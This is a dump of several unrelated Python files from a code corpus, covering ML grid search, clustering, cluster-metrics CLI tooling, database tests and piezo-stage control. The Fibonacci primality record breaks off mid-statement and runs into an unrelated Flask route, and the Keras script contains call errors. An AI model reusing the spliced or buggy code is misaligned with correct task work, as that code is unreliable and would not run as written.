+{"seq_id":"163748789","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport pandas as pd\nfrom time import time\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import GridSearchCV\nfrom tensorflow.python.keras.wrappers.scikit_learn import KerasClassifier\nfrom tensorflow.python.keras.callbacks import TensorBoard\nfrom sklearn.metrics import classification_report\n\n# PARAMETERIZED DL NN\ndef parameterized_deep_net(loss=None,\n optimizer=None,\n metrics=None,\n batch_size=None,\n epochs=None,\n validation_split=None,\n steps_per_epoch=None,\n use_multiprocessing=True):\n model = keras.Sequential()\n model.add(keras.layers.Dense(4, activation=tf.nn.relu))\n model.add(keras.layers.Dense(4, activation=tf.nn.relu))\n model.add(keras.layers.Dense(2, activation=tf.nn.softmax))\n model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n return model\n\n# GATHER DATA\ntrain, val = train_test_split(\n pd.read_csv(\"titanic_imputed_1_hot_encd_norml.csv\", sep=\",\").\n query(expr='Survived > -1'),\n test_size=0.35)\n\nX_train = train[['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'is_male', 'embark_C', 'embark_Q']].values\ny_train = train[['Survived']].values\n\nX_val = val[['Pclass', 'Age', 'SibSp', 'Parch', 'Fare', 'is_male', 'embark_C', 'embark_Q']].values\ny_val = val[['Survived']].values\ndel val, train\n\n\n# TEST MODEL METHOD\ndef test_parameterized_tf_nn():\n batch_size = 10\n epochs = 10\n validation_split = 0.3\n use_multiprocessing = True\n steps_per_epoch = 10\n tensorboard_log = 'tb_logs'\n tensorboard_name = '6. Grid Search NB'\n\n model = parameterized_deep_net(X_train, y_train, X_val, y_val,\n batch_size=batch_size,\n epochs=epochs,\n validation_split=validation_split,\n steps_per_epoch=steps_per_epoch,\n use_multiprocessing=use_multiprocessing,\n tensorboard_log=tensorboard_log,\n tensorboard_name=tensorboard_name)\n# test_parameterized_tf_nn()\n\n# GRID SEARCHING\nbatch_size = [5, 7]\nepochs = [5, 7]\nuse_multiprocessing = [True]\nsteps_per_epoch = [5, 7]\nmetrics = [['accuracy']]\noptimizer = ['adam']\nloss = ['sparse_categorical_crossentropy']\n\nparam_grid = dict(batch_size=batch_size,\n epochs=epochs,\n use_multiprocessing=use_multiprocessing,\n steps_per_epoch=steps_per_epoch,\n metrics=metrics,\n loss=loss,\n optimizer=optimizer)\n\nscoring = {'AUC': 'roc_auc', 'Accuracy': 'accuracy', 'Balanced Accuracy': 'balanced_accuracy'}\n\ntf_nn = KerasClassifier(build_fn=parameterized_deep_net, verbose=1)\nclf = GridSearchCV(estimator=tf_nn,\n param_grid=param_grid,\n n_jobs=10,\n cv=3,\n scoring=scoring,\n refit='AUC',\n return_train_score=True)\n# https://scikit-learn.org/stable//modules/model_evaluation.html\ngrid_result = clf.fit(X_train, y_train)\n\nprint(\"Best parameters set found on development set:\")\nprint()\nprint(clf.best_params_)\nprint()\nprint(\"Grid scores on development set:\")\nprint()\nmeans = clf.cv_results_['mean_test_Accuracy']\nstds = clf.cv_results_['std_test_Accuracy']\nfor mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\"\n % (mean, std * 2, params))\nprint()\n\nprint(\"Detailed classification report:\")\nprint()\nprint(\"The model is trained on the full development set.\")\nprint(\"The scores are computed on the full evaluation set.\")\nprint()\ny_true, y_pred = y_val, clf.predict(X_val)\nprint(classification_report(y_true, y_pred))\nprint()\n\n# ######################################################################################################################\n# ######################################################################################################################\n# ######################################################################################################################\n\nMODEL_NAME = \"TITANIC-TF-MODEL-{}\".format(int(time.time()))\n\nbatch_size = 10\nepochs = 10\nvalidation_split = 0.3\nuse_multiprocessing = True\nsteps_per_epoch = 10\n\nmodel = parameterized_deep_net(batch_size=batch_size,\n epochs=epochs,\n validation_split=validation_split,\n steps_per_epoch=steps_per_epoch,\n use_multiprocessing=use_multiprocessing)\n\n# GRID SEARCH\nmodel = KerasClassifier(build_fn=parameterized_deep_net, verbose=0)\n\nparam_grid = dict(epochs=[1, 3, 5, 7])\ngrid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1, cv=3, scoring='accuracy')\ngrid_result = grid.fit(X_train, y_train)\n\nexit(0)\n","sub_path":"grid_search_deep_net.py","file_name":"grid_search_deep_net.py","file_ext":"py","file_size_in_byte":5081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"262036058","text":"import pandas\n\nfrom sklearn.cluster import KMeans\nfrom super_dash.signals import register_jsonschema\nfrom mine.algorithm.models import Scatter\n\n\nconfig_schema = {\n \"properties\": {\n \"n_clusters\": {\n \"type\": \"number\",\n \"minimum\": 1,\n },\n \"axis\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"string\",\n }\n }\n },\n \"required\": [\"axis\"]\n}\n\nregister_jsonschema.send(sender=None, schema=config_schema,\n import_path='mine.algorithm.kmeans')\n\n\ndef entry(ds, cfg):\n ds = pandas.read_csv(ds)\n n_clusters = cfg.get('n_clusters')\n if n_clusters:\n kmeans = KMeans(n_clusters=n_clusters)\n else:\n kmeans = KMeans()\n labels = kmeans.fit(ds[cfg['axis']]).labels_\n\n models = []\n for i in range(kmeans.n_clusters):\n scatter = Scatter(cfg.get('name'))\n scatter.label = labels[i]\n models.append(scatter)\n for i_loc, series in ds[cfg['axis']].iterrows():\n models[labels[i_loc]].add(series.tolist())\n return models, kmeans.predict\n","sub_path":"mine/algorithm/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"461592895","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\wsgiserialize\\xmlrpc.py\n# Compiled at: 2006-12-06 22:56:10\nfrom xmlrpclib import dumps\n__all__ = [\n 'WSGIXmlRpc', 'xmlrpc']\n\ndef xmlrpc(application, **kw):\n \"\"\"Decorator for XML-RPC serialization.\"\"\"\n return WsgiXmlRpc(application, **kw)\n\n\nclass WsgiXmlRpc(object):\n \"\"\"WSGI middleware for serializing simple Python objects to XML-RPC.\"\"\"\n __module__ = __name__\n\n def __init__(self, application, **kw):\n self.application = application\n self.response = kw.get('methodresponse')\n self.name = kw.get('methodname')\n self.encoding = kw.get('encoding')\n self.allownone = kw.get('allow_none', 0)\n\n def __call__(self, environ, start_response):\n return [\n dumps(tuple([self.application(environ, start_response)]), self.response, self.name, self.encoding, self.allownone)]","sub_path":"pycfiles/wsgiserialize-0.3-py2.4/xmlrpc.py","file_name":"xmlrpc.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"429195290","text":"\"\"\"Download treadmill app metrics given a pattern or exact app name.\n\nThe files are downloaded to the directory specified by the --outdir command\nline option.\n\"\"\"\n\nimport functools\nimport logging\nimport os\nimport urllib.request\nimport urllib.parse\nimport urllib.error\n\nimport click\n\nfrom treadmill import cli\nfrom treadmill import context\nfrom treadmill import fs\nfrom treadmill import restclient\nfrom treadmill import rrdutils\nfrom treadmill.websocket import client as wsc\n\n_LOGGER = logging.getLogger(__name__)\n\n# TODO: this list should be discoverable from the server rather than\n# hardcoded. GET /metrics/core should return this list.\n_SYSTEM_SERVICES = [\n # Total metrics for non-treadmill (system), core services and all apps.\n 'treadmill.system',\n 'treadmill.core',\n 'treadmill.apps',\n]\n\n\ndef _find_nodeinfo_endpoints(api=None):\n \"\"\"Return all the nodeinfo endpoints in the cell.\n\n The return value is a dict with host-endpoint assigments as key-value\n pairs.\n \"\"\"\n endpoints = _get_endpoints(api)\n return _endpoints_by_hosts(endpoints)\n\n\ndef _get_endpoints(api=None):\n \"\"\"Return all the nodeinfo endpoints for the given cell.\"\"\"\n apis = context.GLOBAL.state_api(api)\n\n url = '/endpoint/{}/tcp/nodeinfo'.format(urllib.parse.quote('root.*'))\n response = restclient.get(apis, url)\n\n endpoints = [{\n 'name': end['name'],\n 'proto': end['proto'],\n 'endpoint': end['endpoint'],\n 'hostport': '{0}:{1}'.format(end['host'], end['port'])\n } for end in response.json()]\n\n if not endpoints:\n cli.bad_exit(\"Nodeinfo API couldn't be found\")\n\n return endpoints\n\n\ndef _endpoints_by_hosts(endpoints):\n \"\"\"Return a dict consisting of the host-endpoint pairs as key-values.\"\"\"\n rv = {}\n for ep in endpoints:\n host, _ = ep['hostport'].split(':')\n rv[host] = ep\n\n return rv\n\n\ndef _get_endpoint_for_host(endpoints, host):\n \"\"\"Return the nodeinfo endpoint running on the host in parameter.\"\"\"\n try:\n rv = endpoints[host]\n except KeyError:\n cli.bad_exit('Nodeinfo endpoint not found on %s', host)\n\n return rv\n\n\ndef _instance_to_host_uniq(in_=None, out_=None, uniq=None):\n \"\"\"Update out_ so it contains 'instance: {host, uniq}' as key: value pairs.\n \"\"\"\n if 'event' not in in_ or not in_['event']:\n return True\n\n if 'uniqueid' not in in_['event'] or in_['event']['uniqueid'] != uniq:\n return True\n\n out_[in_['event']['instanceid']] = in_['event']['source']\n return True\n\n\ndef _find_uniq_instance(instance, uniq, ws_api=None):\n \"\"\"Find out where the given instance/uniq is/has been running.\"\"\"\n rv = {}\n message = {'topic': '/trace', 'filter': instance, 'snapshot': True}\n on_message = functools.partial(_instance_to_host_uniq, out_=rv, uniq=uniq)\n\n wsc.ws_loop(ws_api, message, True, on_message)\n\n return rv\n\n\ndef _instance_to_host(in_=None, out_=None):\n \"\"\"Update out_ so it contains 'instance: host' as key: value pairs.\"\"\"\n if 'host' not in in_:\n return True\n\n out_[in_['name']] = in_['host']\n return True\n\n\ndef _find_running_instance(app, ws_api=None):\n \"\"\"Find the instance name(s) and host(s) corresponding to the application.\n \"\"\"\n rv = {}\n message = {'topic': '/endpoints',\n 'filter': app,\n 'proto': 'tcp',\n 'endpoint': 'ssh',\n 'snapshot': True}\n\n on_message = functools.partial(_instance_to_host, out_=rv)\n\n wsc.ws_loop(ws_api, message, True, on_message)\n\n return rv\n\n\ndef _metrics_url(*name_parts):\n \"\"\"Return the url with which the application metrics can be retrieved.\"\"\"\n return '/metrics/{}'.format(urllib.parse.quote('/'.join(name_parts)))\n\n\ndef _rrdfile(outdir, *fname_parts):\n \"\"\"Return the full path of the rrd file where the metrics will be saved.\n \"\"\"\n return os.path.join(outdir, '-'.join(fname_parts) + '.rrd')\n\n\ndef _get_app_rsrc(instance, admin_api=None, cell_api=None):\n \"\"\"Return the application's reserved resources from the manifest.\"\"\"\n try:\n mf = restclient.get(context.GLOBAL.cell_api(cell_api),\n '/instance/%s' % urllib.quote(instance)).json()\n except restclient.NotFoundError:\n mf = restclient.get(context.GLOBAL.admin_api(admin_api),\n '/app/%s' % instance).json()\n\n return {rsrc: mf[rsrc] for rsrc in ('cpu', 'disk', 'memory')\n if rsrc in mf}\n\n\ndef _get_app_metrics(endpoint, instance, timeframe, uniq='running',\n outdir=None, cell_api=None):\n \"\"\"Retreives app metrics.\"\"\"\n fs.mkdir_safe(outdir)\n reserved_rsrc = _get_app_rsrc(instance, cell_api)\n\n api = 'http://{}'.format(endpoint['hostport'])\n _download_rrd(api, _metrics_url(instance, uniq),\n _rrdfile(outdir, instance, uniq), timeframe, reserved_rsrc)\n\n\ndef _get_server_metrics(endpoint, server, timeframe, services=None,\n outdir=None):\n \"\"\"Get core services metrics.\"\"\"\n fs.mkdir_safe(outdir)\n\n api = 'http://{}'.format(endpoint['hostport'])\n\n if not services:\n services = _SYSTEM_SERVICES\n\n # FIXME: give a default value of system limit\n # otherwise the command will crash\n for svc in services:\n _download_rrd(api, _metrics_url(svc), _rrdfile(outdir, server, svc),\n timeframe, {'cpu': '0%', 'disk': '0M', 'memory': '0M'})\n\n\ndef _download_rrd(nodeinfo_url, metrics_url, rrdfile, timeframe,\n reserved_rsrc=None):\n \"\"\"Get rrd file and store in output directory.\"\"\"\n _LOGGER.info('Download metrics from %s/%s', nodeinfo_url, metrics_url)\n try:\n resp = restclient.get(nodeinfo_url, metrics_url, stream=True)\n with open(rrdfile, 'w+b') as f:\n for chunk in resp.iter_content(chunk_size=128):\n f.write(chunk)\n\n rrdutils.gen_graph(rrdfile, timeframe, rrdutils.RRDTOOL,\n reserved_rsrc=reserved_rsrc)\n except restclient.NotFoundError as err:\n _LOGGER.error('%s', err)\n cli.bad_exit('Metrics not found: %s', err)\n except rrdutils.RRDToolNotFoundError:\n cli.bad_exit('The rrdtool utility cannot be found in the PATH')\n\n\n# Disable warning about redefined-builtin 'long' in the options\n# pylint: disable=W0622\ndef init():\n \"\"\"Top level command handler.\"\"\"\n\n ctx = {}\n\n @click.group()\n @click.option('--cell-api',\n envvar='TREADMILL_CELLAPI',\n help='Cell API url to use.',\n required=False)\n @click.option('--api',\n envvar='TREADMILL_STATEAPI',\n help='State API url to use.',\n required=False)\n @click.option('--cell',\n callback=cli.handle_context_opt,\n envvar='TREADMILL_CELL',\n expose_value=False,\n required=True)\n @click.option('--outdir',\n '-o',\n help='Output directory.',\n required=True,\n type=click.Path(exists=True))\n @click.option('--ws-api', help='Websocket API url to use.', required=False)\n def metrics(cell_api, api, outdir, ws_api):\n \"\"\"Retrieve node / app metrics.\"\"\"\n ctx['cell_api'] = cell_api\n ctx['nodeinf_eps'] = _find_nodeinfo_endpoints(api)\n ctx['outdir'] = outdir\n ctx['ws_api'] = ws_api\n\n @metrics.command()\n @cli.ON_REST_EXCEPTIONS\n @click.argument('app_pattern')\n @click.option('--long', is_flag=True, default=False,\n help='Metrics for longer timeframe.')\n def running(app_pattern, long):\n \"\"\"Get the metrics of running instances.\"\"\"\n instances = _find_running_instance(app_pattern, ctx['ws_api'])\n if not instances:\n cli.bad_exit('No running instance matched the pattern.')\n\n _LOGGER.debug('Found instance(s): %s', instances)\n\n timeframe = 'long' if long else 'short'\n for inst, host in instances.items():\n endpoint = _get_endpoint_for_host(ctx['nodeinf_eps'], host)\n _LOGGER.debug(\"getting metrics from endpoint %r\", endpoint)\n\n _get_app_metrics(endpoint, inst, timeframe, outdir=ctx['outdir'],\n cell_api=ctx['cell_api'])\n\n @metrics.command()\n @cli.ON_REST_EXCEPTIONS\n @click.argument('app')\n @click.option('--long', is_flag=True, default=False,\n help='Metrics for longer timeframe.')\n def app(app, long):\n \"\"\"Get the metrics of the application in params.\"\"\"\n instance, uniq = app.split('/')\n if uniq == 'running':\n instances = _find_running_instance(instance, ctx['ws_api'])\n else:\n instances = _find_uniq_instance(instance, uniq, ctx['ws_api'])\n\n if not instances:\n cli.bad_exit('No instance found with the application name.')\n\n _LOGGER.debug('Found instance(s): %s', instances)\n\n timeframe = 'long' if long else 'short'\n for inst, host in instances.items():\n endpoint = _get_endpoint_for_host(ctx['nodeinf_eps'], host)\n _LOGGER.debug(\"getting metrics from endpoint %r\", endpoint)\n\n _get_app_metrics(endpoint, inst, timeframe, uniq,\n outdir=ctx['outdir'], cell_api=ctx['cell_api'])\n\n @metrics.command()\n @cli.ON_REST_EXCEPTIONS\n @click.argument('servers', nargs=-1)\n @click.option('--services', type=cli.LIST, help='Subset of core services.')\n @click.option('--long', is_flag=True, default=False,\n help='Metrics for longer timeframe.')\n def sys(servers, services, long):\n \"\"\"Get the metrics of the server(s) in params.\"\"\"\n timeframe = 'long' if long else 'short'\n for server in servers:\n endpoint = _get_endpoint_for_host(ctx['nodeinf_eps'], server)\n _LOGGER.debug(\"getting metrics from endpoint %r\", endpoint)\n\n _get_server_metrics(endpoint, server, timeframe, services,\n ctx['outdir'])\n\n del running\n del app\n del sys\n\n return metrics\n","sub_path":"treadmill/cli/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":10146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"401067928","text":"import os\nimport mysql.connector\nfrom dotenv import load_dotenv # for python-dotenv method\nload_dotenv() # for python-dotenv method\n\n\ndef connect_to_database():\n # os environments are defined in .env file\n return mysql.connector.connect(host=os.environ.get('HOST'),\n user=os.environ.get('USER'),\n password=os.environ.get('PASSWORD'),\n database=os.environ.get('DATABASE'))\n\n\ndef test_sql_create_color():\n test_val = (\"blue\", \"#123458\")\n\n database = connect_to_database()\n database_cursor = database.cursor()\n\n database_cursor.execute(\"INSERT INTO colors (color_name, hex_value) \\\n VALUES (%s, %s)\", test_val)\n\n assert database_cursor.rowcount == 1\n\n\ndef test_sql_get_all_colors():\n database1 = connect_to_database()\n database_cursor1 = database1.cursor()\n database_cursor1.execute(\"SELECT * FROM colors\")\n expected_rows = len(database_cursor1.fetchall())\n\n database2 = connect_to_database()\n database_cursor2 = database2.cursor()\n database_cursor2.execute(\"SELECT COUNT(*) FROM colors\")\n # comma after actual_rows to unpack tuple of database response\n actual_rows, = database_cursor2.fetchone()\n\n assert expected_rows == actual_rows\n","sub_path":"ai/digimad_backend_ai_io_controller/tests/test_colors.py","file_name":"test_colors.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"246104299","text":"import os\nfrom django.test import SimpleTestCase\nfrom django.test.utils import override_settings\nfrom corehq.apps.app_manager.tests import TestFileMixin\nfrom corehq.apps.userreports.models import CustomDataSourceConfiguration, CustomReportConfiguration\n\n\nclass TestCustomReportConfig(SimpleTestCase, TestFileMixin):\n\n file_path = ('data', 'custom_reports')\n root = os.path.dirname(__file__)\n\n def test_wrap(self):\n wrapped = CustomReportConfiguration.wrap(self.get_json('custom_report_config'))\n self.assertEqual([\"example\", \"dimagi\"], wrapped.domains)\n\n def test_get_all(self):\n with override_settings(CUSTOM_UCR_REPORTS=[self.get_path('custom_report_config', 'json')]):\n all = list(CustomReportConfiguration.all())\n self.assertEqual(2, len(all))\n example, dimagi = all\n self.assertEqual('example', example.domain)\n self.assertEqual('dimagi', dimagi.domain)\n for config in all:\n self.assertEqual('Custom Title', config.title)\n\n def test_production_config(self):\n for data_source in CustomDataSourceConfiguration.all():\n data_source.validate()\n","sub_path":"corehq/apps/userreports/tests/test_custom_reports.py","file_name":"test_custom_reports.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"182966520","text":"#opening the python3 shell\npython3\n\nimport subprocess\nsrc = \"\" # replace with the source directory\ndest = \"\" # replace with the destination directory\n\nsubprocess.call([\"rsync\", \"-arq\", src, dest])\n\n# Exit from the Python shell using exit().","sub_path":"debugging/part2/final_lab/subprocess_rsync_command_line.py","file_name":"subprocess_rsync_command_line.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"469013488","text":"import random\r\n\r\ndef power(a,b):\r\n if b==1:\r\n return a;\r\n elif b==0:\r\n return 1;\r\n elif b%2==0:\r\n return (power(a,b/2)**2);\r\n else:\r\n return (a*power(a,b//2)**2);\r\n\r\nn=int(input(\"Δώσε τον όρο της ακολουθίας Fibonacci: \"));\r\n\r\nif n<=0:\r\n print(\"Σφάλμα! Ο αριθμός που έδωσες είναι μικρότερος του 0\");\r\nelif n==1:\r\n p=0;\r\n print(\"Ο αριθμός είναι πρώτος!\");\r\n\r\nelse:\r\n a=0;\r\n b=1;\r\n c=0;\r\n p=0;\r\n while c')\ndef serve_static(path):\n return send_from_directory('static/', path)\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"119592974","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 20.09.2019\r\n\r\n@author: yu03\r\n'''\r\nfrom pipython import GCSDevice, datarectools, pitools, gcscommands\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\nimport datetime\r\nfrom File_name_define import PI_name, name\r\n\r\nnow = datetime.datetime.now()\r\n\r\ndef Export_Data(file_name, header, out_str):\r\n print('Writing Data')\r\n with open(file_name,'w') as fid: ######################################################################################\r\n fid.writelines(header)\r\n fid.writelines(out_str)\r\n print('Finish Writing')\r\n return\r\n\r\nCONTROLLERNAME = 'E-712'\r\nSTAGES = None # connect stages to axes\r\nREFMODE = None # reference the connected stages\r\n\r\n'''\r\n Parameters for data recorder\r\n'''\r\nNUMVALUES = 500 # number of data sets to record as integer\r\n# NUMVALUES = 600\r\nRECRATE = 250 # number of recordings per second, i.e. in Hz\r\n\r\n'''\r\n Parameters for Wave Generator\r\n'''\r\nNUMPOINTS = 30000 # number of points for one sine period as integer\r\nSTARTPOS = 0.0 # start position of the circular motion as float for both axes\r\nAMPLITUDE = 1 # amplitude of the circular motion as float for both axes\r\n# AMPLITUDE = 200\r\n# if AMPLITUDE >= 50:\r\n# print('AMPLITUDE TOO LARGE')\r\n# exit()\r\nOFFSET = 0\r\nNUMCYLES = 1 # number of cycles for wave generator output\r\n# TABLERATE = 50 # duration of a wave table point in multiples of servo cycle times as integer\r\nTABLERATE = 1\r\n\r\n'''\r\n Moving Axis define\r\n'''\r\n### 1=x,2=y,3=z_rot,4=z,5=x_rot,6=y_rot\r\n\r\nmoving_axis = 2\r\n\r\nwavegens = (1, 2, 3, 4, 5, 6)\r\nwavetables = (1, 2, 3, 4, 5, 6)\r\n\r\nwith GCSDevice(CONTROLLERNAME) as pidevice:\r\n \r\n '''\r\n Initialization\r\n '''\r\n pidevice.InterfaceSetupDlg()\r\n print('connected: {}'.format(pidevice.qIDN().strip()))\r\n print('initialize connected stages...')\r\n pitools.startup(pidevice, STAGES, REFMODE)\r\n IDN = pidevice.qIDN()\r\n print('IDN: ', IDN)\r\n print('Servo Status: ', pidevice.qSVO())\r\n pidevice.WGO(wavegens, mode=[0]*len(wavegens))\r\n '''\r\n Auto-Zero\r\n '''\r\n# pidevice.ATZ({1:0, 2:0, 4:0})\r\n# time.sleep(5)\r\n '''\r\n Turn on control loop\r\n '''\r\n pidevice.SVO({'1':1,'2':1,'3':1,'4':1,'5':1,'6':1})\r\n# print('Servo Status: ', pidevice.qSVO())\r\n '''\r\n Data Recording Configuration\r\n '''\r\n drec = datarectools.Datarecorder(pidevice)\r\n drec.numvalues = NUMVALUES\r\n drec.samplefreq = RECRATE\r\n print('data recorder rate: {:.2f} Hz'.format(drec.samplefreq))\r\n drec.options = (datarectools.RecordOptions.ACTUAL_POSITION_2)\r\n# drec.sources = ('2', '3', '5') ### 2=y=lenth 3=rot_z=hor_angle, 5=rot_x=ver_angle\r\n# drec.trigsources = datarectools.TriggerSources.POSITION_CHANGING_COMMAND_1\r\n drec.trigsources = datarectools.TriggerSources.TRIGGER_IMMEDIATELY_4\r\n# drec.arm()\r\n print('Data recorder TriggerSource: ', pidevice.qDRT())\r\n \r\n print('Sampling Freq. = ', drec.samplefreq)\r\n# pidevice.RTR(60)\r\n# print('Record Table Rate: ', pidevice.qRTR())\r\n \r\n pidevice.DRC(tables=1, sources='2', options=2)\r\n pidevice.DRC(tables=2, sources='3', options=2)\r\n pidevice.DRC(tables=3, sources='5', options=2)\r\n print('Data recorder configuration: ', pidevice.qDRC())\r\n \r\n \r\n \r\n# pidevice.DRT(tables=0, sources=2, values='0')\r\n# print('Data recorder TriggerSource: ', pidevice.qDRT())\r\n \r\n '''\r\n Wave Generator Configuration\r\n '''\r\n# print('Wave Generator Num. ', pidevice.qTWG())\r\n# Servo_update_time = pidevice.qSPA(items=1, params=0x0E000200)[1][234881536]### 0x0E000200\r\n# print('Servo update time: /s', Servo_update_time)\r\n \r\n# pidevice.WAV_LIN(table=wavetables[moving_axis-1], firstpoint=1, numpoints=NUMPOINTS, append='X',\r\n# speedupdown=NUMPOINTS//10, amplitude=AMPLITUDE, offset=OFFSET, seglength=NUMPOINTS)\r\n pidevice.WAV_SIN_P(table=wavetables[1], firstpoint=1, numpoints=NUMPOINTS, append='X',\r\n center=NUMPOINTS/2, amplitude=AMPLITUDE, offset=STARTPOS, seglength=NUMPOINTS)\r\n# pidevice.WAV`_RAMP(table=wavetables[moving_axis-1], firstpoint=1, numpoints=NUMPOINTS, append='X', center=NUMPOINTS/2, \r\n# speedupdown=NUMPOINTS//10, amplitude=45, offset=0, seglength=NUMPOINTS)\r\n pidevice.WSL(wavegens, wavetables)\r\n pidevice.WGC(wavegens, [NUMCYLES]*len(wavegens))\r\n pidevice.WTR(0, tablerates=TABLERATE, interpol=1)\r\n \r\n '''\r\n Trigger Configuration\r\n '''\r\n pidevice.TWC()\r\n# for i in range(NUMPOINTS//6+1): ### 50Hz~12 for TABLERATE 25\r\n for i in range(NUMPOINTS//300+1): ### 50Hz~60 for TABLERATE 5\r\n# pidevice.TWS(lines=2, points=1+6*i, switches=1) ### 50Hz~12 for TABLERATE 25\r\n pidevice.TWS(lines=2, points=1+300*i, switches=1) ### 50Hz~60 for TABLERATE 5\r\n \r\n pidevice.CTO(lines=2, params=1, values=0.1)\r\n# pidevice.CTO(lines=2, params=2, values=2)\r\n pidevice.CTO(lines=2, params=3, values=9)\r\n# Trig_conf = pidevice.qCTO()[2] ### Y_axis=2\r\n# Trig_step = Trig_conf[1]\r\n# Trig_line = Trig_conf[2]\r\n# Trig_mode = Trig_conf[3]\r\n# # print(Trig_conf)\r\n# print('Trigger step = ', float(Trig_step))\r\n# print('Trigger line = ', Trig_line)\r\n# print('Trigger mode = ', Trig_mode)\r\n \r\n# print('Data recorder options: ', pidevice.qHDR())\r\n \r\n\r\n# pitools.waitonready(pidevice)\r\n \r\n# Table_rate = pidevice.qSPA(items=1, params=0x13000109)[1][318767369] ###0x13000109\r\n# print(Table_rate)\r\n# print(pidevice.qWTR(wavegens=1))\r\n pitools.waitontarget(pidevice, '%s'%moving_axis)\r\n print('Servo Status: ', pidevice.qSVO())\r\n \r\n '''\r\n Notice the Axis No.2!!!!\r\n '''\r\n pidevice.WGO(wavegens[moving_axis-1], mode=[1])\r\n while any(list(pidevice.IsGeneratorRunning(wavegens[moving_axis-1]).values())):\r\n print ('.')\r\n time.sleep(1.0)\r\n print('done')\r\n pidevice.WGO(wavegens[moving_axis-1], mode=[0])\r\n\r\n# time.sleep(2.0)\r\n# pidevice.WGO(wavegens=1, mode=0)\r\n \r\n '''\r\n Set Target Relative To Current Position\r\n '''\r\n# pidevice.MVR('2', 0.1) ### y = 2\r\n \r\n '''\r\n Get Target Position\r\n '''\r\n# target_position = pidevice.qMOV() \r\n# target_x, target_y, target_z_r, target_z, target_x_r, target_y_r = pidevice.qMOV()['1'],pidevice.qMOV()['2'],pidevice.qMOV()['3'],pidevice.qMOV()['4'],pidevice.qMOV()['5'],pidevice.qMOV()['6']\r\n# print(target_x, target_y, target_z_r, target_z, target_x_r, target_y_r)\r\n \r\n '''\r\n Get Real Position\r\n '''\r\n# pos = pidevice.qPOS()\r\n# pos_x, pos_y, pos_z_r, pos_z, pos_x_r, pos_y_r = pidevice.qMOV()['1'],pidevice.qMOV()['2'],pidevice.qMOV()['3'],pidevice.qMOV()['4'],pidevice.qMOV()['5'],pidevice.qMOV()['6']\r\n# print(pos_x, pos_y, pos_z_r, pos_z, pos_x_r, pos_y_r)\r\n \r\n \r\n \r\n\r\n '''\r\n Data Recording\r\n '''\r\n \r\n# header, data = drec.getdata()\r\n# y_pos, z_rot, x_rot = data[0], data[1], data[2]\r\n \r\n# samp_time = NUMVALUES/RECRATE\r\n# n_data = NUMVALUES\r\n# print('Sampling Rate = ', RECRATE)\r\n# print('Data length = ', n_data)\r\n# print('Time = ', samp_time)\r\n \r\n\r\n header, data = pidevice.qDRR(tables=[1,2,3], offset=1, numvalues=NUMVALUES)\r\n y_pos, z_rot, x_rot = data[0], data[1], data[2]\r\n# header, data = datarectools.Datarecorder(pidevice).read(offset=1, numvalues=NUMVALUES)\r\n# print('Num. of recorded points: ', pidevice.qDRL())\r\n samp_time = NUMVALUES/RECRATE\r\n n_data = NUMVALUES\r\n \r\n# print(header)\r\n# print((data))\r\n# # y_pos, z_rot, x_rot = data[0], data[1], data[2]\r\n# y_pos = data[0]\r\n \r\n# print('Sampling Rate = ', RECRATE)\r\n# print('Data length = ', n_data)\r\n# print('Time = ', samp_time)\r\n# print(len(y_pos))\r\n\r\n\r\n\r\n''' \r\n 保存文件 Exporting TXT\r\n'''\r\nheader = ['%s\\n' %(name+'_PI'),\r\n 'Local current time : %s\\n' %now.strftime(\"%Y-%m-%d %H:%M:%S\"),\r\n 'Fs = %e (Hz)\\n' %RECRATE,##########################################################################################################\r\n 'Record time: %e (s)\\n' %samp_time,############################################################################################\r\n 'Frame Number = %i\\n' %NUMVALUES,############################################################################################\r\n 'Channel_1: Position /um \\n',############################################################################################\r\n 'Channel_2: Hor_Angle /urad \\n',############################################################################################\r\n 'Channel_3: ver_Angle /urad \\n',############################################################################################\r\n 'Channel_4: xxx \\n',############################################################################################\r\n '-------------------------------------------------\\n',\r\n ]\r\nout_str = ['%f, %f, %f\\n' %(y_pos[i], z_rot[i], x_rot[i]) for i in range(NUMVALUES)]\r\n\r\n'''\r\n Output\r\n'''\r\nExport_Data(PI_name, header, out_str)\r\nprint('TXT file saved')\r\n\r\nt = np.linspace(0, samp_time, num=n_data)\r\n\r\nplt.figure(1)\r\nplt.gcf().set_size_inches(18,9)\r\n\r\nplt.subplot(3,1,1)\r\nplt.plot(y_pos, color='blue', label='length')\r\nplt.title('Length')\r\nplt.xlabel('Time /s')\r\nplt.ylabel('Position /um')\r\nplt.grid(which='both', 